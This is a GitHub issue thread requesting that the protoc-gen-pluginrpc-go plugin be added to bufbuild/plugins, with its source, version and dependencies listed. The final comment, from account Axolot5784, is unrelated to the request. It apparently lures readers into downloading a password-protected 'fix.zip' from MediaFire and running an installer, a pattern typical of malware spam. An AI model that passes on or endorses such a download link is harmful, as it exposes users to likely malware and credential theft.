### ISSUE TITLE
Plugin request for pluginrpc/pluginrpc-go

### ISSUE THREAD

**Issue by bufdev** [bufbuild/plugins#1459]
## Mandatory

**Where is the source code for the plugin?**

https://github.com/pluginrpc/pluginrpc-go/blob/main/cmd/protoc-gen-pluginrpc-go

## Optional

**Does the plugin have a valid semver version?**

`v0.1.0`

**Does the plugin have a dependency on another plugin?**

https://github.com/protocolbuffers/protobuf-go/tree/master/cmd/protoc-gen-go

**Does the output of this plugin depend on any other external libraries?**

https://github.com/pluginrpc/pluginrpc-go, imported as `pluginrpc.com/pluginrpc`

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
